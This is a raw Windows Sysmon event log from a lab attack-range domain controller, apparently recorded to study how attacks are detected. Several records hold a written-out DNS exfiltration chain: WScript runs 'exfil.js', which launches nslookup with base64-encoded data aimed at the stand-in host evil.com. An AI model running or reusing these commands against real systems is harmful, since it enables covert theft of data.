|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000209539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrwph.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-18ED-629A-E243-000000005F02}6087468C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E343-000000005F02}8020C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E343-000000005F02}8020C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.428{2E1864BB-18ED-629A-E143-000000005F02}37762404C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-E343-000000005F02}8020C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.431{2E1864BB-18ED-629A-E343-000000005F02}8020C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-E143-000000005F02}3776C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrwph.tmp 2>&1 10341000x8000000000000000209530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.412{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-E243-000000005F02}608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.412{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-E243-000000005F02}608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.412{2E1864BB-18ED-629A-E243-000000005F02}6087468C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E143-000000005F02}3776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E243-000000005F02}608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E143-000000005F02}3776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.397{2E1864BB-18E0-629A-6742-000000005F02}39767024C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-E143-000000005F02}3776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.399{2E1864BB-18ED-629A-E143-000000005F02}3776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrwph.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.381{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nladqi.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.378{2E1864BB-18ED-629A-DF43-000000005F02}60203832C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E043-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.376{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.376{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.376{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.376{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd